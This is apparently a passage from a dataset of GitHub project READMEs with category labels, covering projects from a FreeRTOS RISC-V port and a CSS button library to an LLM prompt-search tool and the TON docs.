[D4PG]: https://arxiv.org/abs/1804.08617
[DDPG]: https://arxiv.org/abs/1509.02971
[DQN]: https://www.nature.com/articles/nature14236
[HER]: https://arxiv.org/abs/1707.01495
[PER]: https://arxiv.org/abs/1511.05952
[SAC]: https://arxiv.org/abs/1801.01290
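The selector and removal semantics described above (uniform, prioritized, and FIFO/LIFO sampling over a bounded store with a FIFO remover) can be modeled in a few lines of plain Python for intuition. This is a toy sketch only: it does not use the real `dm-reverb` API, and `ToyTable` and its methods are invented names.

```python
import random

class ToyTable:
    """Toy model of a Reverb-style table: items with priorities, plus
    uniform/prioritized/fifo/lifo selection and a max-size FIFO remover."""

    def __init__(self, max_size):
        self.max_size = max_size
        self.items = []  # list of (key, priority), oldest first

    def insert(self, key, priority=1.0):
        self.items.append((key, priority))
        if len(self.items) > self.max_size:
            self.items.pop(0)  # FIFO remover: drop the oldest item

    def sample(self, strategy, rng=random):
        if not self.items:
            raise RuntimeError("rate limiter would block: table is empty")
        if strategy == "fifo":         # oldest item
            return self.items[0][0]
        if strategy == "lifo":         # newest item
            return self.items[-1][0]
        if strategy == "uniform":      # every item equally likely
            return rng.choice(self.items)[0]
        if strategy == "prioritized":  # proportional to stored priority
            total = sum(p for _, p in self.items)
            r = rng.random() * total
            for key, p in self.items:
                r -= p
                if r <= 0:
                    return key
            return self.items[-1][0]
        raise ValueError(strategy)

table = ToyTable(max_size=3)
for i in range(5):
    table.insert(i, priority=float(i + 1))
# Capacity 3 with a FIFO remover keeps only the 3 newest items.
print([k for k, _ in table.items])  # -> [2, 3, 4]
print(table.sample("fifo"))         # -> 2 (oldest)
print(table.sample("lifo"))         # -> 4 (newest)
```

The real Reverb tables add the pieces this sketch omits: shared data elements referenced by multiple items, `max_times_sampled`, and rate limiters that actually block callers instead of raising.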
os
udacity-elastic-image-filter
# Udagram Image Filtering Microservice

The microservice Elastic Beanstalk project can be found <a href="http://image-filter-starter-code-dev3.us-east-1.elasticbeanstalk.com">here</a>.

Udagram is a simple cloud application developed alongside the Udacity Cloud Engineering Nanodegree. It allows users to register and log into a web client, post photos to the feed, and process photos using an image filtering microservice.

The project is split into three parts:

1. [The Simple Frontend](https://github.com/udacity/cloud-developer/tree/master/course-02/exercises/udacity-c2-frontend): a basic Ionic client web application which consumes the RestAPI backend (covered in the course).
2. [The RestAPI Backend](https://github.com/udacity/cloud-developer/tree/master/course-02/exercises/udacity-c2-restapi): a Node-Express server which can be deployed to a cloud service (covered in the course).
3. [The Image Filtering Microservice](https://github.com/udacity/cloud-developer/tree/master/course-02/project/image-filter-starter-code): the final project for the course. It is a Node-Express application which runs a simple script to process images.

## Your assignment tasks

### Setup Node environment

You'll need to create a new Node server. Open a new terminal within the project directory and run:

1. Initialize a new project: `npm i`
2. Run the development server with `npm run dev`

### Create a new endpoint in the server.ts file

The starter code has a task for you to complete: an endpoint in `src/server.ts` which uses a query parameter to download an image from a public URL, filter the image, and return the result.

We've included a few helper functions to handle some of these concepts, and we're importing them for you at the top of the `src/server.ts` file:

```typescript
import { filterImageFromURL, deleteLocalFiles } from './util/util';
```

### Deploying your system

Follow the process described in the course to `eb init` a new application and `eb create` a new environment to deploy your image filter service. Don't forget you can use `eb deploy` to push changes.

## Stand out (optional)

### Refactor the course RestAPI

If you're feeling up to it, refactor the course RestAPI to make a request to your newly provisioned image server.

### Authentication

Prevent requests without valid authentication headers.

Note: if you choose to submit this, make sure to add the token to the Postman collection, and export the Postman collection file to your submission so we can review it.

### Custom domain name

Add your own domain name and have it point to the running services. Try adding a subdomain name to point to the processing server.

Note: domain names are not included in the AWS free tier and will incur a cost.
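The endpoint described above accepts a query parameter carrying a public image URL, so its first job is validating that parameter before downloading anything. The starter code is TypeScript; as a language-neutral illustration, here is just the validation step sketched in Python (the helper name `validate_filter_request` is hypothetical and not part of the project):

```python
from urllib.parse import urlparse, parse_qs

def validate_filter_request(query_string):
    """Hypothetical sketch: return (ok, payload) where payload is the image
    URL when the request is valid, or an error message for a 400 response."""
    params = parse_qs(query_string)
    urls = params.get("image_url")
    if not urls:
        return False, "image_url query parameter is required"
    url = urls[0]
    parsed = urlparse(url)
    # The endpoint downloads from a public URL, so require http(s) plus a host.
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return False, "image_url must be a public http(s) URL"
    return True, url

print(validate_filter_request("image_url=https://example.com/cat.jpg"))
print(validate_filter_request("foo=bar"))
```

In the actual project, a valid URL would then flow through `filterImageFromURL`, and `deleteLocalFiles` would clean up the temporary file after the response is sent.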
cloud
frontend-tips
frontend tips html css http codeguide co http instanceof pro code guide js airbnb https github com airbnb javascript javascript ru https learn javascript ru coding style http isobar idev github io code standards css https github com necolas idiomatic css tree master translations ru ru https github com web standards ru dictionary 1 css https github com yoksel common words 2 html https github com ademaro css class list blob main readme md 3 css https github com nicothin idiomatic pre css blob gh pages words and abbreviations md http habrahabr ru post 273471 front end developer handbook 2017 https frontendmasters gitbooks io front end handbook 2017 content 10 en https web dev one line layouts https www notion so ademaro a7049d6381f84c72a7dcd5f24824117a html5 whatwg https developers whatwg org 2 https html spec whatwg org multipage w3c https www w3 org tr html51 html5 https pp vk me c627726 v627726125 665f lt tk5tljk0 jpg http html5doctor com http bitsofco de 2015 sectioning content in html5 div section article eng http pepelsbey net pres sense coding http pepelsbey net 2011 07 sense coding http design for business ru analytics articles id 504 htm http www smashingmagazine com 2012 12 17 css baseline the good the bad and the ugly 2 http zellwk com blog why vertical rhythms html https habr com en post 546994 aria html5 http prgssr ru development ispolzovanie aria v html5 html http www cmsmagazine ru library items graphical design nesting sites for people with disabilities http blog gov design blog 2016 11 08 accessibility html https te st ru 2015 02 25 reframing accessibility for the web web html5 wai aria https habrahabr ru post 240065 http nicothin pro page dostupnost veb stranicy wcag https webaim org resources contrastchecker https www a11yproject com checklist 5 https www better dev most common a11y mistakes image replacement https css tricks com the image replacement museum css https habr com post 256109 https habrahabr ru company yandex blog 276035 https yoksel 
github io html tree 2 https nglazov github io bem validator page css https nicothin github io idiomatic pre css flexbox http pepelsbey net 2013 05 flexbox gotcha http html5 by blog flexbox https codepen io ademaro full zwgwxe http bennettfeely com flexplorer https github com philipwalton flexbugs http bitsofco de 6 reasons to start using flexbox https www smashingmagazine com 2016 02 the flexbox reading list flexbox https preview webflow com preview flexbox game preview d1a26b027c4803817087a91c651e321f m 1 http flexboxfroggy com http www flexboxdefense com http www cssauthor com css flexbox 11 flexbox https habrahabr ru post 329820 flexbox css3 flexible box https habrahabr ru post 313938 css tricks https css tricks com snippets css a guide to flexbox css flex https habr com ru company ruvds blog 515298 grid layout https www youtube com watch v jorvuilxlxu https pepelsbey net pres grid layout https www youtube com watch v gdg6mv hdls http css moscow 2 grid layout pdf https cssgridgarden com css tricks https css tricks com snippets css complete guide grid css grid generator https grid layoutit com grid cheatsheet yoksel https yoksel github io grid cheatsheet grids on mdn https developer mozilla org en us docs learn css css layout grids css minmax grid https habr com en company ruvds blog 529830 css grid https habr com en company macloud blog 564182 adaptive https habr com en company ruvds blog 525410 javascript es5 javascript https habrahabr ru post 281110 throttling debouncing https medium com nuances of programming throttling debouncing 4f0a839769ef throttling vs debouncing en https css tricks com debouncing throttling explained examples debounce vs throttle vs audit vs sample https dev to rxjs debounce vs throttle vs audit vs sample difference you should know 1f21 html script async defer module nomodule src https tproger ru translations script execution order reduce en https www freecodecamp org news the ultimate guide to javascript array methods reduce en https 
www freecodecamp org news how to count objects in an array https developer mozilla org ru docs web javascript reference operators nullish coalescing operator lexicalenvironment closures ecmascript https habr com en post 474852 js dom https habr com ru company macloud blog 557422 git http githowto com ru http pcottle github io learngitbranching http rogerdudler github io git guide index ru html http habrahabr ru post 268951 https www youtube com watch v uww7tvgcdh8 https github com ademaro technomart http githowto com ru atlassian en https www atlassian com git en https help github com 19 git http habrahabr ru company mailru blog 267595 https github com tiimgreen github cheat sheet https github com nicothin web development tree master git github https habrahabr ru company 2gis blog 306166 git https medium com abatickaya d0 be d1 85 d1 82 d0 b2 d0 be d1 8e d0 bc d0 b0 d1 82 d1 8c git 7b269498afd7 bc9rsiows https gitmoji carloscuesta me 2 https www webpagefx com tools emoji cheat sheet git http frontender info git the safety net for your projects git happens 6 git https habr com company flant blog 419733 https habr com en post 416887 git https habr com en company flant blog 472278 https dangitgit com ru https ohshitgit com ru git svg svg https svgontheweb com ru svg http habrahabr ru company devexpress blog 269331 svg use with external source en https css tricks com svg use external source svg css https habrahabr ru post 348194 favicons svg favicons https austingil com svg favicons fonts https www cssfontstack com 2016 https habrahabr ru post 310044 c localstorage woff2 https htmlacademy ru blog 61 maps google maps https habrahabr ru post 324880 https leafletjs com examples quick start https github com shramov leaflet plugins blob master layer tile yandex md advanced z index http habrahabr ru post 166435 22 css https betterprogramming pub 22 css tricks that can make you a layout ninja 452847fba639 https habrahabr ru post 174057 front end http alexfedoseev com post 54 
frontend project build https developers google com web fundamentals performance rendering stick to compositor only properties and manage layer count the future of css scroll linked animations with scroll timeline pt 1 https www bram us 2021 02 23 the future of css scroll linked animations part 1 prefetch preconnect prerender https scotch io tutorials browser resource hinting with prefetch preconnect and prerender preload prefetch and other link tags https 3perf com blog link rels 1 critical render path https habr com en company hh blog 513940 web animations api web animations api http css live ru articles pogovorim ob web animations api html 1 http css live ru articles rukovodstvo po web animations api chast 1 sozdanie bazovoj animacii html 2 animationplayer http css live ru articles rukovodstvo po web animations api chast 2 animationplayer i upravlenie vremennoj shkaloj html 3 http css live ru articles rukovodstvo po web animations api chast 3 mnozhestvennye animacii html 4 http css live ru articles rukovodstvo po web animations api chast 4 gruppovye i posledovatelnye effekty html 5 http css live ru articles rukovodstvo po web animations api chast 5 priyatnaya traektoriya dvizheniya html preprocessors easy media queries shortcodes w less tester tag https codepen io jokerinteractive pen vyrozd postcss quickstart guide gulp setup http webdesign tutsplus com tutorials postcss quickstart guide gulp setup cms 24543 4 postcss https habrahabr ru post 280988 css en http ipestov com 22 essential css recipes postcss http forwebdev ru css about postcss sass css stylelint en http www creativenightly com 2016 02 how to lint your css with stylelint sass 1 http prgssr ru development estetichnyj sass chast 1 arhitektura i organizaciya html 2 http prgssr ru development estetichnyj sass chast 2 cveta i palitry html 3 http prgssr ru development estetichnyj sass chast 3 tipografika i vertikalnyj ritm html email email https www caniemail com 2 https www campaignmonitor com css html 
https sendhtmail ru 2 https putsmail com optimization 2021 https habr com en company mailru blog 543434 14 https habr com en post 684836 security http https habr com en company timeweb blog 568288 tools css https habr com ru company macloud blog 557580 psd http freebiesbug com psd freebies website template http www freepik com free psd web templates https psdrepo com tag free psd website templates https symu co freebies templates 4 https dcrazed com free photoshop psd website templates http blazrobar com tag full website design examples sliders http tympanus net development parallaxcontentslider http tympanus net tutorials fullscreenslitslider icons http line25 com articles free pure css icon sets https github com ihorzenich html5checklist javascript https makehtml github io everyone has js https bitsofco de all about favicons and touch icons https github com makehtml what happens when blob russian readme ru rst what forces layout reflow https gist github com paulirish 5d52fb081b3570c81e3a 10 https nicothin pro page windows subsystem for linux https medium com swlh are you using svg favicons yet a guide for modern browsers 836a6aace3df
front_end
Awesome-GPT
# Awesome-GPT [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)

Awesome papers, datasets, and projects about the study of large language models like GPT-3, GPT-3.5, ChatGPT, GPT-4, etc.

## Papers

### Survey

- A Survey on In-context Learning (arXiv 2023) [[paper](https://arxiv.org/pdf/2301.00234.pdf)]
- A Survey on GPT-3 (arXiv 2023) [[paper](https://arxiv.org/pdf/2212.00857.pdf)]
- A Survey of Large Language Models (arXiv 2023) [[paper](https://arxiv.org/pdf/2303.18223.pdf)]

### 2023

- Tree of Thoughts: Deliberate Problem Solving with Large Language Models (arXiv 2023) [[paper](https://arxiv.org/pdf/2305.10601.pdf)] [[code](https://github.com/princeton-nlp/tree-of-thought-llm)]
- GPT-4 Technical Report (OpenAI 2023) [[paper](https://cdn.openai.com/papers/gpt-4.pdf)]
- ReAct: Synergizing Reasoning and Acting in Language Models (ICLR 2023, notable top 5%) [[paper](https://openreview.net/pdf?id=WE_vluYUL-X)] [[code](https://anonymous.4open.science/r/ReAct-2268)]
- Selection-Inference: Exploiting Large Language Models for Interpretable Logical Reasoning (ICLR 2023, notable top 5%) [[paper](https://openreview.net/pdf?id=3Pf3Wg6o-A4)]
- What Learning Algorithm Is In-context Learning? Investigations with Linear Models (ICLR 2023, notable top 5%) [[paper](https://openreview.net/pdf?id=0g0X4H8yN4I)]
- Language Models Are Greedy Reasoners: A Systematic Formal Analysis of Chain-of-Thought (ICLR 2023) [[paper](https://arxiv.org/pdf/2210.01240.pdf)] [[code](https://github.com/asaparov/prontoqa)]
- Visual ChatGPT: Talking, Drawing and Editing with Visual Foundation Models (arXiv 2023) [[paper](https://arxiv.org/pdf/2303.04671.pdf)] [[code](https://github.com/microsoft/visual-chatgpt)]
- Toolformer: Language Models Can Teach Themselves to Use Tools (arXiv 2023) [[paper](https://arxiv.org/pdf/2302.04761.pdf)] [[code](https://github.com/lucidrains/toolformer-pytorch)]
- Check Your Facts and Try Again: Improving Large Language Models with External Knowledge and Automated Feedback (arXiv 2023) [[paper](https://arxiv.org/pdf/2302.12813.pdf)]
- Can GPT-3 Perform Statutory Reasoning? (arXiv 2023) [[paper](https://arxiv.org/pdf/2302.06100v1.pdf)]
- How Close is ChatGPT to Human Experts? Comparison Corpus, Evaluation, and Detection (arXiv 2023) [[paper](https://arxiv.org/pdf/2301.07597.pdf)]
- Large Language Models Can Be Easily Distracted by Irrelevant Context (arXiv 2023) [[paper](https://arxiv.org/pdf/2302.00093.pdf)]
- Theory of Mind May Have Spontaneously Emerged in Large Language Models (arXiv 2023) [[paper](https://arxiv.org/ftp/arxiv/papers/2302/2302.02083.pdf)]
- ChatGPT Makes Medicine Easy to Swallow: An Exploratory Case Study on Simplified Radiology Reports (arXiv 2023) [[paper](https://arxiv.org/pdf/2212.14882.pdf)]

### 2022

- Large Language Models are Zero-Shot Reasoners (NeurIPS 2022) [[paper](https://arxiv.org/pdf/2205.11916.pdf)]
- Chain-of-Thought Prompting Elicits Reasoning in Large Language Models [[paper](https://arxiv.org/pdf/2201.11903.pdf)]
- Automatic Chain of Thought Prompting in Large Language Models [[paper](https://arxiv.org/pdf/2210.03493.pdf)]
- What Can Transformers Learn In-Context? A Case Study of Simple Function Classes (arXiv 2022) [[paper](https://arxiv.org/pdf/2208.01066.pdf)] [[code](https://github.com/dtsip/in-context-learning)]
- Rethinking the Role of Demonstrations: What Makes In-Context Learning Work? (arXiv 2022) [[paper](https://arxiv.org/pdf/2202.12837.pdf)] [[code](https://github.com/Alrope123/rethinking-demonstrations)]
- Why Can GPT Learn In-Context? Language Models Secretly Perform Gradient Descent as Meta-Optimizers (arXiv 2022) [[paper](https://arxiv.org/pdf/2212.10559.pdf)]

### 2021

- Medically Aware GPT-3 as a Data Generator for Medical Dialogue Summarization (PMLR 2021) [[paper](https://proceedings.mlr.press/v149/chintagunta21a/chintagunta21a.pdf)]
- GPT Understands, Too (arXiv 2021) [[paper](https://arxiv.org/pdf/2103.10385.pdf)]
- WebGPT: Browser-Assisted Question-Answering with Human Feedback (arXiv 2021) [[paper](https://arxiv.org/pdf/2112.09332.pdf)] [[code](https://www.microsoft.com/en-us/bing/apis/bing-web-search-api)]

### 2020

- Language Models are Few-Shot Learners (NeurIPS 2020) [[paper](https://arxiv.org/pdf/2005.14165.pdf)]

## Datasets

- [Hello-SimpleAI/HC3](https://huggingface.co/datasets/Hello-SimpleAI/HC3)

## Projects

- [awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts)
ai
FreeRTOS-RISCV
# OBSOLETE

This repository is no longer maintained, as RISC-V support was officially added to FreeRTOS:

- FreeRTOS homepage: https://www.freertos.org
- FreeRTOS ports: https://www.freertos.org/RTOS_ports.html
- Upstream repository: https://sourceforge.net/projects/freertos
- Quickstart guide: https://www.freertos.org/Using-FreeRTOS-on-RISC-V.html

# FreeRTOS for RISC-V

This is a port of FreeRTOS to RISC-V.

## Contributors

- The original port to priv spec 1.7 was contributed by [Technolution](https://interactive.freertos.org/hc/en-us/community/posts/210030246-32-bit-and-64-bit-RISC-V-using-GCC)
- Update to priv spec 1.9: [illustris](https://github.com/illustris)
- Update to priv spec 1.9.1: [Abhinaya Agrawal](https://bitbucket.org/casl/freertos-riscv-v191/src)
- Bug fixes: [Julio Gago](https://github.com/julio-gago-metempsy)
- Update to priv spec 1.10: [sherrbc1](https://github.com/sherrbc1)

## Build

You can edit `main()` in [main.c](Demo/riscv-spike/main.c) to add your FreeRTOS task definitions and set up the scheduler. To build FreeRTOS:

```bash
cd Demo/riscv-spike
export RISCV=/opt/riscv # your RISCV tools path here
make
```

## Run

```bash
spike riscv-spike.elf
```

## Tested environments

Tested on a Rocket RISC-V processor with a local interrupt controller (CLINT), using preemption. Tested in Spike and Verilator with several builds, including single-task, multi-task, and typical demo tests including queues, semaphores, mutexes, and about a dozen concurrent tasks.
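To build intuition for what the demo exercises (a scheduler multiplexing tasks that communicate through a queue), here is a toy generator-based analogue in Python. It is purely conceptual: the comments name FreeRTOS calls only as loose analogies, and none of this resembles the actual C port.

```python
from collections import deque

def scheduler(tasks, steps):
    """Round-robin over generator-based 'tasks', loosely like a cooperative
    scheduler; each next() runs one slice until the task yields."""
    ready = deque(tasks)
    for _ in range(steps):
        if not ready:
            break
        task = ready.popleft()
        try:
            next(task)
            ready.append(task)  # still runnable: back of the ready queue
        except StopIteration:
            pass  # task finished; drop it

log = []

def producer(queue):
    for i in range(3):
        queue.append(i)                 # analogue of xQueueSend
        log.append(("produced", i))
        yield                           # analogue of taskYIELD()

def consumer(queue):
    while True:
        if queue:
            log.append(("consumed", queue.popleft()))  # analogue of xQueueReceive
        yield

q = deque()
scheduler([producer(q), consumer(q)], steps=10)
print(log)
```

With one producer and one consumer alternating, the log interleaves strictly: each value is consumed on the slice after it is produced.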
risc-v freertos
os
CareFinder
# CareFinder

Project for the course IN4325 Information Retrieval (Web Information Systems), Delft University of Technology. Assignment by [myTomorrows](https://mytomorrows.com).

## Milestones

![Milestones](assets/milestones.png)
server
Geography-Quiz-App
geography quiz app
server
front-end-system-design
# Front-end System Design

A checklist for front-end system design.

## Requirements

- How many users? Where are users distributed?
- What is our frame budget?
- Do we need to support mobile?
- Offline support
- Internationalization
- Accessibility
- Browser targets

## Architecture

- MVC / MVW / container-component architecture
- Data flow model: two-way data binding vs unidirectional data flow
- Component tree design
- System walkthrough

## Performance patterns

- Fast initial load time
  - App-shell architecture
  - SSR
  - Caching: rehydrate application state from previously cached state
- Assets
  - Route-based code splitting
  - Minification, dead-code stripping
- Network
  - Lazy vs eager loading
  - Service worker: caching API requests
- Compute
  - WebGL, WebAssembly, WebWorkers, SharedArrayBuffer
- UI
  - Optimistic UI
  - Virtual list

## Examples

- Design a Facebook Messenger client
- Design a gigapixel client
- Design the Uber client
- Design the Twitter newsfeed
- Design the Google Docs client
- Design a performance dashboard for a client-side app

## Readings

- [Facebook BigPipe](https://www.facebook.com/notes/facebook-engineering/bigpipe-pipelining-web-pages-for-high-performance/389414033919)
- [Making Slack Faster By Being Lazy](https://slack.engineering/making-slack-faster-by-being-lazy-88da4481baa7)
- [Design an image hosting platform](http://www.aosabook.org/en/distsys.html)
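The "virtual list" item above refers to rendering only the rows that intersect the viewport, with spacer elements standing in for everything else. The core of the pattern is the window arithmetic, sketched here in Python (the function name, parameters, and overscan default are illustrative, not from any particular library):

```python
def visible_range(scroll_top, viewport_height, item_height, item_count, overscan=2):
    """Indices [start, end) of the items a virtual list should render.

    Only these rows get DOM nodes; the rest is represented by top/bottom
    spacers so the scrollbar keeps the correct size. 'overscan' renders a
    few extra rows on each side to hide blank flashes during fast scrolls.
    """
    first = scroll_top // item_height
    # Ceiling division: last row whose top edge is above the viewport bottom.
    last = (scroll_top + viewport_height + item_height - 1) // item_height
    start = max(0, first - overscan)
    end = min(item_count, last + overscan)
    return start, end

# 10,000 rows of 40px in a 600px viewport: only ~19 rows need DOM nodes.
print(visible_range(scroll_top=4000, viewport_height=600,
                    item_height=40, item_count=10_000))  # -> (98, 117)
```

A real implementation recomputes this on every scroll event (usually throttled with `requestAnimationFrame`) and absolutely positions the rendered rows at `index * item_height`.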
front_end
phoenix-rtos-utils
# phoenix-rtos-utils

This repository contains basic Phoenix-RTOS utilities, e.g. `psh` (Phoenix shell) and `psd` (Phoenix serial downloader). To learn more, refer to the [Phoenix-RTOS documentation](https://github.com/phoenix-rtos/phoenix-rtos-doc).

This work is licensed under a BSD license. See the LICENSE file for details.
os
knopf.css
# knopf.css

Modern, modular, extensible button system, designed for both rapid prototyping and production-ready applications.

Made by [Frameable](https://frameableinc.com), the team behind [Social Hour](https://socialhour.com) and [Subtask](https://subtask.co).

## Installation

Just [download](http://knopf.dev/knopf.css.zip) and include the minified stylesheet on your website:

```html
<link rel="stylesheet" href="knopf.min.css">
```

You could also link to a CDN-hosted file:

```html
<link rel="stylesheet" href="https://unpkg.com/knopf.css/knopf.min.css">
```

Otherwise, you can use your favorite package manager to install it as a dependency:

```shell
# install with npm
npm install knopf.css

# install with yarn
yarn add knopf.css
```

And then import it wherever you are importing your styles:

```node
import 'knopf.css'
```

## Usage

By including knopf you get a bunch of [goodies](https://codepen.io/hiroagustin/full/MDVRDVG) out of the box. However, you should probably customize the styles to meet your design needs, and there are multiple ways of doing just that.

### Override default values

All of the base values can be changed by overriding the custom properties at `:root`:

```css
:root {
  --knopf-hue: 164;
  --knopf-saturation: 88;
  --knopf-luminosity: 28;
}
```

```html
<button class="knopf">button</button>
```

### Extend via modifier

You can also create your own class that sets new values for a particular instance:

```css
.negative {
  --knopf-hue: 356;
  --knopf-saturation: 57;
  --knopf-luminosity: 51;
}
```

```html
<button class="knopf negative">button</button>
```

### Leverage the cascade

As with any CSS library, you can override the base class to make it your own. This approach still lets you take advantage of the existing properties, variables, and modifiers:

```css
.knopf.knopf {
  --knopf-raised-height: 6px;
  border-block-end-color: hsl(var(--knopf-hover-background-color));
  border-block-end-width: var(--knopf-raised-height);
  margin-block-start: calc(var(--knopf-raised-height) * -1);
}

.knopf.knopf:hover {
  --knopf-raised-height: 2px;
  border-block-end-color: hsl(var(--knopf-active-background-color));
}
```

```html
<button class="knopf large wide pill">button</button>
```

The same logic is applicable to all of the built-in modifiers. Try out the [playground](https://knopf.dev/playground) to check them out. I would also suggest taking a look at the [source code](https://github.com/team-video/knopf.css/blob/main/knopf.css) for the full list of customizable custom properties.

## Contributing

Please read the [contribution guidelines](CONTRIBUTING.md) in order to make the contribution process easy and effective for everyone involved.
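To get a feel for the color the default custom properties above produce (`--knopf-hue: 164`, `--knopf-saturation: 88`, `--knopf-luminosity: 28`), here is a quick stdlib computation of the equivalent hex value. This is purely illustrative: knopf itself resolves these values in CSS via `hsl()`, and the helper name is my own.

```python
import colorsys

def hsl_to_hex(hue, saturation, luminosity):
    """Convert CSS-style hsl(hue, saturation%, luminosity%) to #rrggbb."""
    # colorsys uses HLS argument order and 0..1 ranges.
    r, g, b = colorsys.hls_to_rgb(hue / 360, luminosity / 100, saturation / 100)
    return "#{:02x}{:02x}{:02x}".format(round(r * 255), round(g * 255), round(b * 255))

# The default knopf button color: a saturated, fairly dark green.
print(hsl_to_hex(164, 88, 28))
```

The same function can preview any modifier, e.g. `hsl_to_hex(356, 57, 51)` for the `.negative` class defined above.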
knopf css css-framework utility-classes design-system ui-component
os
GrIPS
# GrIPS: Gradient-free, Edit-based Instruction Search for Prompting Large Language Models

Authors: [Archiki Prasad](https://archiki.github.io), [Peter Hase](https://peterbhase.github.io), [Xiang Zhou](https://owenzx.github.io), and [Mohit Bansal](https://www.cs.unc.edu/~mbansal) (UNC Chapel Hill)

[Paper](https://arxiv.org/abs/2203.07281)

**Note:** this is a preliminary version of our code. The complete code to run all experiments in the paper will be added shortly.

<img src="assets/main_pipeline.png" alt="teaser image" width="750">

## Dependencies

This code is written using PyTorch and [Hugging Face's transformers repo](https://github.com/huggingface/pytorch-transformers). Running GrIPS with GPT-2 models requires access to GPUs. The search is quite lightweight (no model training is involved), so one GPU should suffice. On the other hand, running GrIPS with InstructGPT or GPT-3 models requires an OpenAI API key; please add your key to the `openai_key.txt` file.

## Installation

The simplest way to run our code is to start with a fresh environment:

```
conda create -n grips python=3.9
source activate grips
pip install -r requirements.txt
```

## Running search

`run_search.py` contains the implementation of GrIPS. By default, we use the InstructGPT babbage model. To use a different GPT-3 model from the API, change `model_name` in `nat_inst_gpt3.py`. To switch to GPT-2 models, import `nat_inst_gpt2.py` and use an appropriate model. `expanded_encodeinstructions.py` is a data loader file that interfaces with the task datasets provided in Natural Instructions.

Here is an example command to run GrIPS with the default InstructGPT babbage:

```
python run_search.py --mode instruction_only --task_idx 0 --train_seed 0 \
    --num_compose 1 --num_candidates 5 --num_iter 10 --patience 2 --write_preds \
    --meta_dir logs/ --meta_name babbage_all_edits_l_1_m_5_n_10_seed_0.txt
```

## Acknowledgments

We thank the authors and contributors of [Calibrate Before Use](https://github.com/tonyzhaozh/few-shot-learning) and [Natural Instructions](https://github.com/allenai/natural-instructions) for their public code release.

## Reference

Please cite our paper if you use our code in your works:

```bibtex
@article{prasad2022grips,
  title         = {GrIPS: Gradient-free, Edit-based Instruction Search for Prompting Large Language Models},
  author        = {Archiki Prasad and Peter Hase and Xiang Zhou and Mohit Bansal},
  year          = {2022},
  archivePrefix = {arXiv},
  primaryClass  = {cs.CL},
  eprint        = {2203.07281}
}
```
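Each iteration of the search proposes edited instruction candidates and keeps the best-scoring ones. The sketch below illustrates just the candidate-generation step, under simplifying assumptions: it edits at the word level rather than the parser-derived phrase level used in the paper, omits the paraphrase operation and LLM scoring, and `propose_candidates` is an illustrative name, not a function from this repo:

```python
import random

# Hedged sketch of GrIPS-style edit-based candidate generation.
# The paper's edit set is {delete, swap, paraphrase, add}; paraphrase
# needs a paraphrase model, so it is left out of this toy version.
EDIT_OPS = ("del", "swap", "add")

def propose_candidates(instruction, num_candidates=5, seed=0):
    rng = random.Random(seed)
    words = instruction.split()
    candidates = []
    for _ in range(num_candidates):
        op = rng.choice(EDIT_OPS)
        w = list(words)
        if op == "del" and len(w) > 1:
            # delete a random unit
            w.pop(rng.randrange(len(w)))
        elif op == "swap" and len(w) > 1:
            # swap two random units
            i, j = rng.sample(range(len(w)), 2)
            w[i], w[j] = w[j], w[i]
        elif op == "add":
            # re-insert an existing unit at a random position
            w.insert(rng.randrange(len(w) + 1), rng.choice(words))
        candidates.append(" ".join(w))
    return candidates
```

In the real search, each candidate would then be scored on a small train set via the LLM API, and the best candidate seeds the next iteration (with `--patience` controlling early stopping).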
**Label:** ai
# ton-docs
<img align="left" width="300px" src="static/img/readme/about.png">

# TON Blockchain Documentation

This is the official repository for The Open Network documentation.

Latest documentation release: [docs.ton.org](https://docs.ton.org)

The mission of this documentation is to collect all available information and knowledge that can help TON developers. You can improve the documentation by following the steps below.

<img align="right" width="300px" src="static/img/readme/contribute.png">

## Join TON Docs Club

TON is an actively growing ecosystem, and every day many devs contribute to its development. You can participate in TON by helping to organize knowledge, making pull requests, and creating tutorials to help other developers. Feedback, lectures, technical articles, tutorials, and examples: all of this can help the developer community grow even faster.

Join the [TON Docs Club chat in Telegram](https://t.me/+c-0fvo4xhqsyowm8) to join the contributors' party.

<img align="left" width="300px" src="static/img/readme/how.png">

## How to contribute

If you are a developer and faced some difficulties, then successfully overcame them, share this knowledge with future developers:

- Have an issue? Prepare a solution with the [TON Docs Wizard](https://t.me/ton_docs_bot).
- Have an idea? [Submit a feature request](https://github.com/ton-community/ton-docs/issues/new/choose).
- Want to contribute? [Set up your environment](https://github.com/ton-community/ton-docs#set-up-your-environment).
- ✏️ [Contributing best practices](https://ton.org/docs/contribute)

## Set up your environment

If you are changing the sidebar or adding media files, please check that your submission will not break production. You can do this in two ways:

### Cloud (quick way)

Use Gitpod, a free, online, VS Code-like IDE, for contributing. It will launch a workspace with a single click:

[![Open in Gitpod](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/ton-community/ton-docs)

### Local (default way)

1. Download the repository from GitHub.
2. Install the latest [Node.js LTS](https://nodejs.org/en/download) to run the local build.
3. Open a terminal in the project directory.
4. Install dependencies with the command `npm install`.
5. Run the project with the command `npm run start`.

This command starts a local development server and opens a browser window. Most changes are reflected live without having to restart the server.

## License

[GPL-3.0](https://choosealicense.com/licenses/gpl-3.0)
**Topics:** docs, ton, hacktoberfest, hack-ton-berfest
**Label:** blockchain